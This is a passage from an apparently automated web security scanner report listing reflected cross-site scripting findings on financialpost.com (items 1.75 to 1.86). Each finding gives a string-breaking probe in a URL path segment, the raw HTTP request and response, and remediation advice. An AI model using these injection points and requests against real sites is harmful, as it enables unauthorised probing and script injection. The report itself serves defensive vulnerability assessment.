This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur74d93'%3be0889b50b05/advice/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44241


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur74d93';e0889b50b05/advice/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur74d93';e0889b50b05;kw=advice;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=77742683?">
...[SNIP]...

1.75. http://www.financialpost.com/entrepreneur/advice/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/advice/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed228'%3b2c8aa648e62 was submitted in the REST URL parameter 2. This input was echoed as ed228';2c8aa648e62 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur/adviceed228'%3b2c8aa648e62/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43385


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/adviceed228';2c8aa648e62/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=adviceed228';2c8aa648e62;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=61143280?">
...[SNIP]...

1.76. http://www.financialpost.com/entrepreneur/killer+apps/3967312/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/killer+apps/3967312/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83f2b'%3b12bcecac1dd was submitted in the REST URL parameter 1. This input was echoed as 83f2b';12bcecac1dd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur83f2b'%3b12bcecac1dd/killer+apps/3967312/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75646
Expires: Sun, 19 Dec 2010 03:14:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur83f2b';12bcecac1dd/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur83f2b';12bcecac1dd;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=30614803?">
...[SNIP]...

1.77. http://www.financialpost.com/entrepreneur/killer+apps/3967312/story.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/killer+apps/3967312/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9123'%3bb2fb6e2f239 was submitted in the REST URL parameter 3. This input was echoed as f9123';b2fb6e2f239 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur/killer+apps/3967312f9123'%3bb2fb6e2f239/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 53710
Expires: Sun, 19 Dec 2010 03:14:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/killer-apps/3967312f9123';b2fb6e2f239/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=killer-apps;kw=3967312f9123';b2fb6e2f239;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=34256389?">
...[SNIP]...

1.78. http://www.financialpost.com/entrepreneur/killer+apps/3967312/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /entrepreneur/killer+apps/3967312/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1b1a'%3b6b59f0dfd4e was submitted in the REST URL parameter 4. This input was echoed as d1b1a';6b59f0dfd4e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /entrepreneur/killer+apps/3967312/d1b1a'%3b6b59f0dfd4e HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:14:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:14:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43793


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/entrepreneur/killer%20apps/3967312/d1b1a';6b59f0dfd4e/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=entrepreneur;kw=killer%20apps;kw=3967312;kw=d1b1a';6b59f0dfd4e;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=99358960?
...[SNIP]...

1.79. http://www.financialpost.com/executive/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 774a7'%3b09a396780ea was submitted in the REST URL parameter 1. This input was echoed as 774a7';09a396780ea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive774a7'%3b09a396780ea/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43161


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive774a7';09a396780ea/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive774a7';09a396780ea;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=17355478?">
...[SNIP]...

1.80. http://www.financialpost.com/executive/Departures+2010/3987965/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Departures+2010/3987965/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d37d2'%3b1feea254f5a was submitted in the REST URL parameter 1. This input was echoed as d37d2';1feea254f5a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executived37d2'%3b1feea254f5a/Departures+2010/3987965/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 84441
Expires: Sun, 19 Dec 2010 03:11:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executived37d2';1feea254f5a/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executived37d2';1feea254f5a;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=69285676?">
...[SNIP]...

1.81. http://www.financialpost.com/executive/Departures+2010/3987965/story.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Departures+2010/3987965/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14022'%3bbd82e3b5b53 was submitted in the REST URL parameter 3. This input was echoed as 14022';bd82e3b5b53 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/Departures+2010/398796514022'%3bbd82e3b5b53/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69246
Expires: Sun, 19 Dec 2010 03:12:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/departures-2010/398796514022';bd82e3b5b53/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=departures-2010;kw=398796514022';bd82e3b5b53;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=92756471?">
...[SNIP]...

1.82. http://www.financialpost.com/executive/Departures+2010/3987965/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Departures+2010/3987965/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55e80'%3b7249d7b80f9 was submitted in the REST URL parameter 4. This input was echoed as 55e80';7249d7b80f9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/Departures+2010/3987965/55e80'%3b7249d7b80f9 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43809


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/departures%202010/3987965/55e80';7249d7b80f9/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=departures%202010;kw=3987965;kw=55e80';7249d7b80f9;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=63817518
...[SNIP]...

1.83. http://www.financialpost.com/executive/Discover+your+true+competitive+advantage/3992781/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Discover+your+true+competitive+advantage/3992781/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86b9c'%3bbb1481860ca was submitted in the REST URL parameter 1. This input was echoed as 86b9c';bb1481860ca in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive86b9c'%3bbb1481860ca/Discover+your+true+competitive+advantage/3992781/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74233
Expires: Sun, 19 Dec 2010 03:12:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive86b9c';bb1481860ca/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive86b9c';bb1481860ca;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=32248287?">
...[SNIP]...

1.84. http://www.financialpost.com/executive/Discover+your+true+competitive+advantage/3992781/story.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Discover+your+true+competitive+advantage/3992781/story.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e36a'%3b760d8d1d1a9 was submitted in the REST URL parameter 3. This input was echoed as 7e36a';760d8d1d1a9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/Discover+your+true+competitive+advantage/39927817e36a'%3b760d8d1d1a9/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70169
Expires: Sun, 19 Dec 2010 03:12:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/discover-your-true-competitive-advantage/39927817e36a';760d8d1d1a9/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=discover-your-true-competitive-advantage;kw=39927817e36a';760d8d1d1a9;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surrou
...[SNIP]...

1.85. http://www.financialpost.com/executive/Discover+your+true+competitive+advantage/3992781/story.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Discover+your+true+competitive+advantage/3992781/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c91c'%3bb0f449f0d2e was submitted in the REST URL parameter 4. This input was echoed as 1c91c';b0f449f0d2e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executive/Discover+your+true+competitive+advantage/3992781/1c91c'%3bb0f449f0d2e HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:13:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38647


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/discover%20your%20true%20competitive%20advantage/3992781/1c91c';b0f449f0d2e/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=discover%20your%20true%20competitive%20advantage;kw=3992781;kw=1c91c';b0f449f0d2e;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcook
...[SNIP]...

1.86. http://www.financialpost.com/executive/Leadership+companies+honest+with+their+employees/3987151/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /executive/Leadership+companies+honest+with+their+employees/3987151/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3dfa'%3bc1a1cb098d5 was submitted in the REST URL parameter 1. This input was echoed as b3dfa';c1a1cb098d5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /executiveb3dfa'%3bc1a1cb098d5/Leadership+companies+honest+with+their+employees/3987151/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74644
Expires: Sun, 19 Dec 2010 03:12:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
